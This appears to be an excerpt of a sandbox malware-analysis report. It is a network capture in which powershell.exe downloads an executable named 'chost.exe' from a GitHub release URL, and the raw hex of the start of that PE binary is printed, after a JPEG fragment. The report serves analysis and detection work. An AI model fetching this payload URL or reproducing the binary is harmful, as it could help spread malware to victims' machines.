HIT, HIT X-Cache-Hits: 39, 0 X-Timer: S1733423780.781007,VS0,VE17
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 07 a8 05 be 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 21 10 01 01 01 01 01 00 03 01 01 01 01 01 01 00 00 00 00 01 11 12 02 21 31 61 03 41 13 81 51 04 ff c4 00 17 01 01 01 01 01 00 00 00 00 00 Data Ascii: JFIFHHC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"!!1aAQ
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: b9 fd 01 ec 9e da ed e4 9f d1 b9 fd 05 7a 3a 5e 9e 79 fd 17 fe 9f a2 3b f4 9d 38 ff 00 d3 f5 3b fd 15 db a4 ed c6 ff 00 46 2f f4 07 7b ed 8b ed c3 d7 f4 62 ff 00 51 1e 9e cf fa 3c 77 fa fe 93 fb 7e 83 db 3d b5 3d bc 5e 7f af eb a4 fe 82 bd 93 d2 f4 f2 cf e8 dc f6 0e fa bd 38 76 76 83 bf 49 ae 5d a7 64 1d ba 35 c7 b3 bf d2 0e bd 1d 39 76 76 0e ba 74 e5 d9 d8 3a f4 74 e5 da 76 41 db a3 a7 1e ce c1 db a3 a7 1e ce c1 db a5 e9 c3 fe 8b ff 00 40 76 e8 e9 c7 b5 ec 1d 74 d7 2e ff 00 57 a0 74 d3 5c fa 4e c8 3a f4 74 e5 df ea 76 41 d7 4d 72 ec ec 83 ae 9a e5 d9 d9 07 5d 35 cb b2 fb 20 e9 ac f4 e7 7d b3 7d fe 83 af 49 d3 85 fe 8c ff 00 d1 47 a7 b5 e9 e5 ff 00 a3 5e 7f a0 3d 53 d2 cf 4f 3c f7 fa dc f6 0e da bf fa e5 3d 2f 48 3a 69 ac 74 74 0d 8c 75 fa 74 0d e8 e7 d1 Data Ascii: z:^y;8;F/{bQ<w~==^8vvI]d59vvt:tvA@vt.Wt\N:tvAMr]5 }}IG^=SO<=/H:ittut
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 28 22 8a 20 08 80 00 22 85 10 51 6a 20 a1 44 5c 04 aa 00 00 02 28 00 a0 00 a0 80 00 3a 00 db 40 00 00 20 2a 7f a0 02 08 69 a9 6b 37 d2 8b 6c 4d 62 fa c6 6f b1 5d 2d 8c da e7 7d b3 7d 83 76 b3 6c 62 ff 00 46 2f b4 1d 2a 31 da 74 90 74 46 7a 5e 93 c8 0c df 49 7d 1e 55 bd 59 5c 6f b3 b5 88 f4 cf 4e 93 d3 c7 3f a3 a4 fe 8d 41 eb 9e 9b 95 e5 9e db 9f d3 e0 1e 8e 8d 71 9f d1 7f e8 0e d3 d1 d3 8f 6b d8 3b 74 74 e3 da f6 0e bd 1d 39 76 74 0e ba 74 e7 d7 c2 74 0e 9a 6b 9d f6 9d 83 af 49 6b 9f 69 d8 37 ba cd 67 a3 a0 2c 4b e5 7a 4d 04 e4 e5 7a 3a 06 79 39 5d 34 0e 4e 4d 86 a0 72 72 bd 26 81 c9 c9 d1 a0 b8 61 d1 d0 18 98 74 9d 02 e1 89 d2 74 0d 61 8c f4 bd 03 58 98 9d 1d 01 89 ca f4 68 a9 ca cf 06 b5 28 24 f2 72 dc 8b 80 e7 c3 37 cb b5 8c d8 0e 37 Data Ascii: (" "Qj D\(:@ ik7lMbo]-}}vlbF/1ttFz^I}UY\oN?Aqk;tt9vtttkIki7g,KzMz:y9]4NMrr&attaXh($r77
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: 83 96 26 3a f2 72 0e 72 35 1b e5 67 91 58 c2 c7 4e 4e 44 72 e4 e5 d7 93 91 5c 6c 4c 76 e5 39 11 cb 16 46 f9 5e 41 98 b9 5a e5 71 15 81 ae 4e 41 95 5e 5a 90 19 31 ac 5c 07 34 c7 5e 52 c0 72 a8 eb 7c a7 20 cf 97 48 92 35 20 05 5c 4a 83 3a ba 8b 80 31 5b 4b 14 72 ac d7 4b e5 9e 41 95 5e 4e 44 45 d5 e4 e4 19 d4 ad f2 9c 83 95 47 4b e5 9e 54 23 b7 87 39 e5 d3 cc 07 6f 35 d7 cb 8f 98 eb e5 9d 56 e5 5d 41 05 d1 04 1a d3 59 01 ad 35 90 1a d3 59 50 5d 56 54 15 59 8a 82 80 00 0a 80 08 a0 02 25 15 15 00 00 00 14 01 40 00 00 00 01 40 44 22 90 00 00 74 01 b5 00 00 00 00 00 a2 50 4a cd 6a b3 54 66 c6 79 6a d4 d0 63 0e 5a 01 8e 53 96 c0 63 93 96 81 13 95 9e 55 60 a7 27 2d 28 8c 72 70 d8 0e 7c 2f 0d 82 b1 c2 f2 d2 fc 03 1c af 2d 69 a0 cf 27 2a 02 72 72 ba 02 72 72 a0 13 Data Ascii: &:rr5gXNNDr\lLv9F^AZqNA^Z1\4^Rr\| H5 \J:1[KrKA^NDEGKT#9o5V]AY5YP]VTY%@@D"tPJjTfyjcZScU`'-(rp\|/-i'*rrrr
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: f5 01 c7 d5 72 b5 db d4 d7 2b e4 19 d5 9a 72 d4 f2 0d 4a d4 bf 29 3c b5 20 2c ad 4a ce 2e 03 5a 6a 20 16 a6 ae 33 40 d4 be 8c 4b 01 2d 4d 5c 4c 03 5a 95 9c 58 0d ca d4 f4 c4 58 0e 93 d1 d3 31 41 ad 35 90 1a d4 e9 10 12 fa 72 f5 e9 bf 4e 5e 94 73 f5 e9 8e 96 c6 79 54 59 5d 7c d7 2f 3e 5d 7c f9 15 d3 cd 74 95 ce 46 e2 0e 93 d2 f4 c2 a0 74 97 d2 25 05 eb f4 e9 90 1b e8 e9 80 1d 3a 5e 9c d4 1b e9 9b e9 12 83 37 d3 1d 1e 98 11 b9 eb f5 b9 e9 c6 37 01 da 7a 6b a7 28 d4 07 5e 97 a7 30 57 4e 92 fa 60 06 fa 3a 63 41 1b e9 a9 e9 ca 2e 83 a7 49 d3 3a 84 1a e8 e9 80 1d 67 a6 e5 71 9f 6e 9e 53 47 69 5b 72 f2 e9 05 68 00 00 00 00 00 10 01 00 00 00 10 00 14 01 49 f4 a7 f8 00 a9 14 46 c0 6d 40 00 00 00 00 00 11 9b 1b 40 62 c4 c7 44 c5 1c f9 4e 5d 70 c0 72 e4 e5 d7 0c 07 Data Ascii: r+rJ)< ,J.Zj 3@K-M\LZXX1A5rN^syTY]\|/>]\|tFt%:^77zk(^0WN`:cA.I:gqnSGi[rhIFm@@bDN]pr
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: 50 80 00 28 0b 82 06 00 00 0a 15 15 10 00 50 05 88 00 28 00 80 00 00 00 00 00 00 02 a0 00 a0 08 00 00 00 00 28 00 80 00 00 00 00 8a 22 80 a8 b0 00 00 8a 8a 23 60 36 a0 6a 02 88 08 00 00 02 88 25 a0 a9 ac da 9d 28 de 9a c7 47 40 de ae b9 f4 74 0e 9a 6b 1d 1d 03 7a 31 d2 74 0e 9a ae 5d 2f 40 e9 ab ae 7a bd 03 a6 9a c7 4b a0 d4 ab ac 6a ee 83 4a ce ac 41 44 51 44 56 6d f8 54 35 35 2d 62 fa 06 fa 35 cb a4 ed 47 5e 92 d7 3e 93 a0 6e d6 6b 3d 25 f4 0b 59 4b 4d 05 4c 34 d0 30 c3 4d d0 4c 4b 15 2d 06 6c 73 b3 e5 d2 b3 41 ce a6 35 51 45 8d f9 8c cf b7 4f 31 05 f3 1b 90 f3 1b 91 15 9e 53 1d 73 e1 9b 10 72 b1 9a e9 5c fd 28 86 b3 6b 37 d2 a3 ae 9a e5 d1 d2 8e 9a cd 4d 35 15 9c 4c 68 03 cf 97 49 19 8d c4 1a 91 79 58 d4 88 31 c9 cb ae 1c 83 97 2c df 2e f8 cd 80 e1 63 Data Ascii: P(P(("#`6j%(G@tkz1t]/@zKjJADQDVmT55-b5G^>nk=%YKML40MLK-lsA5QEO1Ssr\(k7M5LhIyX1,.c
2024-12-05 18:36:19 UTC	1378	IN	Data Raw: 9c 5c 5c 50 49 17 17 04 11 31 a1 46 6c 66 f9 74 4c 07 3b e5 9b e5 d7 13 01 cb 84 e5 db 13 3f 0a 39 70 9c bb 61 c9 47 1e 53 87 6b e5 39 fc 28 e5 c2 f0 eb cf e1 85 1c b9 39 75 c8 72 51 cb 83 87 5c 30 a3 97 27 2e 98 60 ae 7c a7 2e b8 98 0c 72 bc b5 8a 83 38 b8 b8 60 26 18 b8 60 33 89 8d e1 ff 00 80 c7 29 cb a2 60 31 ca 72 e9 86 14 73 e4 e5 bc 30 a3 9f 29 cb ae 1c ad 1c 79 39 75 c3 0a 31 3c b5 22 e2 a0 86 28 09 82 e0 83 38 58 d7 fe 0a 31 89 7c b7 86 03 9f 2c f2 ed 89 85 1c b9 4e 5d 70 cf c2 8e 5c a7 2e d8 98 51 cb 93 97 5c 4c 28 e7 c9 cb a6 26 14 63 93 1b 0a 39 f2 cd f2 eb 89 61 47 1b e5 39 75 b1 31 46 27 9f 97 4f 33 13 1a 80 d4 69 22 b2 0b 80 00 04 50 31 50 41 70 c5 10 c5 c3 10 41 70 11 05 01 05 c4 c0 30 c3 0c 04 c1 40 41 40 44 b1 ac 4c 06 2c 66 c7 4c 4b e4 Data Ascii: \\PI1FlftL;?9paGSk9(9urQ\0'.`\|.r8`&`3)`1rs0)y9u1<"(8X1\|,N]p\.Q\L(&c9aG9u1F'O3i"P1PApAp0@A@DL,fLK
2024-12-05 18:36:20 UTC	1378	IN	Data Raw: 1d 39 f4 74 0d f4 97 d3 16 b3 7d 03 af 47 4e 37 d1 d0 3b 6a f4 e5 3d 2c f4 0e ba 6b 9c f4 ba 0d ea 6b 3a 97 d0 37 a9 b1 8e 93 a4 1d 35 75 cf a5 d5 1a d4 b5 35 8f 54 17 d7 a6 6f a7 3f 5e 98 be be 41 db b6 a7 a7 9f a6 a7 a0 7a 27 a6 ba 71 9e 9a e8 1d 34 d8 c7 49 d2 0e 9b 0d 73 9e 8e 94 74 d8 74 e7 d1 7d 20 df 49 d3 9f 49 d0 3a f4 bd 38 f4 b3 d0 3b 4b 17 5c 67 a6 ba 07 4d 4b 59 d4 b4 16 d6 2f a4 f5 e9 cb d7 a0 75 e8 9e 9c 3b 59 ec 1e 99 e9 75 c2 7a 6e 7a 07 5d 35 8e 8e 81 bd 46 7a 34 15 13 a6 6f a1 5b d3 5c fa 3a 07 44 67 a3 a1 16 b3 4b e9 8b e8 1a d5 d8 e3 d2 cf 40 ed 2c 6e 38 cf 4d ca 0e 93 ed 58 95 67 a0 6c 67 4e 81 a3 58 e8 e8 56 f4 d6 3a 3a 06 f4 d6 3a 3a 41 bd 35 8e 8e 81 ad 4b 59 be 99 be 97 05 b5 9b e9 9b e9 cf d7 b1 1d 7b 3a 79 fb 6a 7b fd 51 e8 9e Data Ascii: 9t}GN7;j=,kk:75u5To?^Az'q4Istt} II:8;K\gMKY/u;Yuznz]5Fz4o[\:DgK@,n8MXglgNXV::::A5KY{:yj{Q
2024-12-05 18:36:20 UTC	1378	IN	Data Raw: ae f2 fc b5 ae 72 b4 c8 7a ac 5a b7 e9 8b 54 4b 53 7f 59 b7 e5 35 47 49 5b 95 c6 57 4f 37 e5 07 69 5a 63 cb 71 04 b1 cf d3 7e ab 9f a0 62 fd b3 bf a7 aa c5 aa 37 bf a9 6f eb 3a 9a a3 7b fa 6b 1a 4a 0e 92 ba 79 72 f2 eb e5 07 4f 2d b1 1b 64 5c 5c 04 0c 30 5f 80 4c 31 41 53 0c 50 19 b1 33 f1 b0 47 3e 57 96 cc 06 79 31 ac 05 67 0c fc 68 c0 63 3f 0c 6b 0c 11 9c 2c 6a c4 c1 58 cf c3 3f 1b c3 01 cf 95 e7 f1 ac 5c 85 18 cf c4 be 5d 3e 0f 80 73 e4 e5 bc 5c 28 c7 2b 3c b4 61 46 70 c6 84 a3 38 63 5f 02 8c e7 e1 9f 8d 18 94 63 3f 0c fc 6f 02 8e 7c ae 7e 37 89 85 19 cf c4 e5 bc 30 a3 9d f2 97 cb ae 26 2d 1c 6f 94 e3 f1 db 3f 0e 4a 38 f1 f8 b3 ce 3a f2 62 51 cf 93 3f 1d 30 c1 1c f3 f0 cf c6 f0 c2 8c 67 e1 9f 8d e1 80 cf 27 3f 8d 62 e0 33 c9 9f 8d e0 0c e2 e2 e2 8a 2a Data Ascii: rzZTKSY5GI[WO7iZcq~b7o:{kJyrO-d\\0_L1ASP3G>Wy1ghc?k,jX?\]>s\(+<aFp8c_c?o\|~70&-o?J8:bQ?0g'?b3*
2024-12-05 18:36:20 UTC	1378	IN	Data Raw: a1 34 00 34 d4 00 05 00 00 05 00 00 05 04 15 12 80 00 02 88 00 2a 05 10 00 01 15 04 10 00 01 45 80 20 00 a0 00 00 00 00 00 00 00 00 00 00 28 82 22 89 a0 2a 00 00 2a a8 8b a8 82 00 00 02 e9 a8 00 00 00 00 00 00 02 88 a0 00 00 1a 00 80 28 00 06 82 06 80 3d 00 3a 05 4a 25 fb 10 45 bf 49 51 50 00 11 6a 08 8c d6 99 15 9a 8b 50 19 b1 2f 96 d1 47 2b e1 9e 1d f1 9c 07 1e 0e 1d b1 70 1c a7 86 a7 87 49 e5 64 06 27 93 97 49 14 1c b9 4e 5d 70 07 1e 57 87 4c 5c 07 2e 1a 9e 5d 31 64 06 67 97 49 08 d4 41 64 6e 31 17 45 69 59 d0 1a 19 d3 41 ad 44 d3 41 44 d3 41 46 77 0d 06 b5 13 4d 11 44 f8 3e 3f f8 2a 89 f0 01 40 00 00 2a 05 04 4d 35 9b 54 2d 4e 99 b5 8b e8 1d 35 65 71 e9 67 a0 76 95 75 ca 7a 6b 41 bd 4b e9 9d 66 fa 06 fa 66 fa 62 fa 67 a0 75 e9 7a 71 e9 7a 07 6d 35 cf Data Ascii: 44E ("(=:J%EIQPjP/G+pId'IN]pWL\.]1dgIAdn1EiYADADAFwMD>?@*M5T-N5eqgvuzkAKffbguzqzm5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	20.233.83.145	443	280	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 18:36:26 UTC	204	OUT	GET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2024-12-05 18:36:27 UTC	956	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 05 Dec 2024 18:36:27 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-05 18:36:27 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.199.109.133	443	280	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 18:36:28 UTC	642	OUT	GET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-12-05 18:36:29 UTC	794	IN	HTTP/1.1 200 OK Connection: close Content-Length: 8652434 Content-Type: application/octet-stream Last-Modified: Sun, 01 Dec 2024 14:46:15 GMT ETag: "0x8DD1216E8819A8C" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 7e86654e-801e-000b-1d01-441a3e000000 x-ms-version: 2024-08-04 x-ms-creation-time: Sun, 01 Dec 2024 14:46:15 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=chost.exe x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 704 Date: Thu, 05 Dec 2024 18:36:29 GMT X-Served-By: cache-iad-kjyo7100152-IAD, cache-ewr-kewr1740068-EWR X-Cache: HIT, HIT X-Cache-Hits: 14, 0 X-Timer: S1733423789.181524,VS0,VE20
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 3d 90 33 30 5c fe 60 30 5c fe 60 30 5c fe 60 7b 24 fd 61 37 5c fe 60 7b 24 fb 61 84 5c fe 60 7b 24 fa 61 3a 5c fe 60 20 d8 03 60 33 5c fe 60 20 d8 fd 61 39 5c fe 60 20 d8 fa 61 21 5c fe 60 20 d8 fb 61 18 5c fe 60 7b 24 ff 61 3b 5c fe 60 30 5c ff 60 ab 5c fe 60 7b d9 fa 61 29 5c fe 60 7b d9 fc 61 31 5c fe 60 52 69 63 68 30 5c fe 60 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t=30\`0\`0\`{$a7\`{$a\`{$a:\` `3\` a9\` a!\` a\`{$a;\`0\`\`{a)\`{a1\`Rich0\`PEd
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: d8 48 8b fb 4d 8b cc 41 b8 01 00 00 00 48 0f 47 f8 48 8b cd 48 8b d7 e8 8e f2 00 00 48 83 f8 01 72 69 48 03 ef b8 00 20 00 00 48 2b df 75 cf 8b c6 48 8b 7c 24 70 48 8b 6c 24 60 85 c0 74 0b 49 8b cf e8 f7 3d 01 00 4c 8b fe 49 8b cc e8 08 ef 00 00 49 8b f7 4d 85 ff 74 0e 48 8b d7 49 8b cf e8 19 35 00 00 44 8b e8 48 8b ce e8 ce 3d 01 00 48 8b 5c 24 68 41 8b c5 48 8b 74 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 e8 86 3d 01 00 4d 8d 4e 12 4c 8d 05 4b a6 02 00 48 8d 0d 78 a6 02 00 8b 10 e8 05 17 00 00 41 8b c5 eb 83 48 89 54 24 10 48 89 4c 24 08 53 55 56 57 41 56 41 57 48 81 ec 88 00 00 00 33 c0 4d 8b f0 48 8b da 48 89 44 24 50 48 8b f9 48 89 44 24 58 41 b8 58 00 00 00 48 89 44 24 60 48 8d 15 70 a4 02 00 89 44 24 28 48 8d 4c 24 20 48 89 44 24 20 8b e8 49 Data Ascii: HMAHGHHHriH H+uH\|$pHl$`tI=LIIMtHI5DH=H\$hAHt$xH0A_A^A]A\_=MNLKHxAHT$HL$SUVWAVAWH3MHHD$PHHD$XAXHD$`HpD$(HL$ HD$ I
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 00 49 8b cf e8 77 f0 00 00 85 c0 79 28 e8 a2 38 01 00 4c 8d 4f 12 4c 8d 05 1f a2 02 00 48 8d 0d 54 a2 02 00 8b 10 e8 21 12 00 00 bb ff ff ff ff e9 20 01 00 00 80 7f 10 01 75 18 45 33 c9 4d 8b c4 48 8b d7 49 8b cf e8 00 fb ff ff 8b d8 e9 02 01 00 00 4c 89 6c 24 30 33 db 41 bd 00 20 00 00 4c 89 74 24 28 41 8b cd e8 83 38 01 00 4c 8b f0 48 85 c0 75 28 e8 3a 38 01 00 4c 8d 4f 12 4c 8d 05 bf a0 02 00 48 8d 0d 14 a0 02 00 8b 10 e8 b9 11 00 00 bb ff ff ff ff e9 ae 00 00 00 48 89 74 24 58 8b 77 0c 48 85 f6 0f 84 90 00 00 00 48 89 6c 24 50 66 0f 1f 84 00 00 00 00 00 49 3b f5 48 8b ee 4d 8b cf 41 b8 01 00 00 00 49 0f 47 ed 49 8b ce 48 8b d5 e8 6e ec 00 00 48 83 f8 01 72 36 4d 8b cc 41 b8 01 00 00 00 48 8b d5 49 8b ce e8 94 f3 00 00 48 83 f8 01 72 07 48 2b f5 75 bd Data Ascii: Iwy(8LOLHT! uE3MHILl$03A Lt$(A8LHu(:8LOLHHt$XwHHl$PfI;HMAIGIHnHr6MAHIHrH+u
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 48 89 93 20 10 00 00 8b 02 48 03 d0 48 3b 93 10 10 00 00 72 86 48 8b cf e8 79 e4 00 00 48 8b b4 24 a8 00 00 00 48 8b c3 48 8b 8c 24 88 00 00 00 48 33 cc e8 62 a9 00 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 48 83 ec 38 49 8b f0 48 8d 6c 24 78 48 8b da 48 8b f9 e8 9b f3 ff ff 48 89 6c 24 28 4c 8b ce 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 2c 2d 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 81 ec 80 02 00 00 48 8b 05 42 c3 03 00 48 33 c4 48 89 84 24 70 02 00 00 48 8b 41 18 4c 8d 05 dc 9d 02 00 4c 8b 49 10 48 8b f9 48 83 c1 28 48 89 44 24 20 ba Data Ascii: H HH;rHyH$HH$H3bL$I[ Ik(I_LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHH,-HH8_^][H\$Hl$Ht$ WHHBH3H$pHALLIHH(HD$
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 83 ec 50 48 8b 05 ae be 03 00 48 33 c4 48 89 44 24 40 48 8b f1 0f b7 ea 48 8b 89 30 20 00 00 45 0f b7 f0 ff 15 af 92 02 00 48 8b d8 48 85 c0 0f 84 90 00 00 00 0f b7 8e 58 20 00 00 33 ff 0f b7 86 5e 20 00 00 48 89 7c 24 30 89 7c 24 3c 8d 14 49 8b cd 2b ca 48 8b 96 48 20 00 00 2b c8 89 4c 24 38 48 85 d2 74 0c 48 8b cb ff 15 40 8e 02 00 48 8b f8 48 8d 56 28 c7 44 24 20 50 25 00 00 4c 8d 4c 24 30 41 b8 ff ff ff ff 48 8b cb ff 15 4d 92 02 00 48 83 be 48 20 00 00 00 74 0c 48 8b d7 48 8b cb ff 15 07 8e 02 00 48 8b 8e 30 20 00 00 48 8b d3 ff 15 17 92 02 00 0f b7 54 24 3c 66 2b 54 24 34 eb 05 ba 14 00 00 00 0f b7 8e 60 20 00 00 44 0f b7 8e 5e 20 00 00 66 3b d1 0f b7 c1 c7 44 24 28 01 00 00 00 66 0f 43 c2 89 4c 24 20 0f b7 96 58 20 00 00 48 8b 8e 28 20 00 00 44 8b Data Ascii: PHH3HD$@HH0 EHHX 3^ H\|$0\|$<I+HH +L$8HtH@HHV(D$ P%LL$0AHMHH tHHH0 HT$<f+T$4` D^ f;D$(fCL$ X H( D
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 8b d7 48 8b 08 48 83 c9 01 e8 50 25 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 56 b8 40 10 00 00 e8 8c a1 00 00 48 2b e0 48 8b 05 02 b9 03 00 48 33 c4 48 89 84 24 30 10 00 00 48 8b e9 4c 8d b4 24 78 10 00 00 48 8d 7c 24 30 bb 00 10 00 00 33 f6 e8 0b 2b 01 00 44 8b c8 4c 8d 05 c9 94 02 00 48 8d 05 a2 95 02 00 8b d3 48 8d 4c 24 30 48 89 44 24 20 e8 f9 f4 ff ff 85 c0 78 19 48 63 c8 48 8d 7c 24 30 8b f0 48 03 f9 2b d8 b8 00 00 00 00 0f 49 c3 8b d8 48 63 db e8 94 e8 ff ff 4c 89 74 24 28 4c 8b cd 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 25 22 01 00 4c 8d 0d 4a 95 02 00 c7 44 24 20 10 00 00 00 4c 8d 05 53 95 02 00 8b d6 48 8d Data Ascii: HHP%HH8_^][HL$HT$LD$LL$ SUVWAV@H+HH3H$0HL$xH\|$03+DLHHL$0HD$ xHcH\|$0H+IHcLt$(LLHD$ HHH%"LJD$ LSH
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 5b c3 cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 54 41 55 41 56 41 57 b8 58 20 00 00 e8 50 9c 00 00 48 2b e0 48 8b 05 c6 b3 03 00 48 33 c4 48 89 84 24 40 20 00 00 45 33 ed 48 8d 74 24 40 41 8b ed 4d 8b f8 44 8b e2 4c 8b f1 bf 00 10 00 00 e8 cd 25 01 00 44 8b c8 4c 8d 05 d3 8f 02 00 8b d7 48 8d 4c 24 40 e8 f7 f9 ff ff 85 c0 78 18 48 63 c8 48 8d 74 24 40 8b e8 48 8d 34 4e 8b cf 2b c8 41 8b fd 0f 49 f9 48 63 df e8 63 e3 ff ff 4d 8b cf 4c 8b c3 48 8b d6 48 8b 08 48 8d 84 24 b8 20 00 00 48 89 44 24 28 48 83 c9 01 4c 89 6c 24 20 e8 44 1f 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 48 63 d7 4c 8d 05 77 8f 02 00 4d 8b ce 48 8b ce e8 7c f9 ff ff 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 4c 89 6c 24 30 41 Data Ascii: [LD$LL$ SUVWATAUAVAWX PH+HH3H$@ E3Ht$@AMDL%DLHL$@xHcHt$@H4N+AIHccMLHHH$ HD$(HLl$ DHxHc+AHH4NHcLwMH\|xHc+AHH4NLl$0A
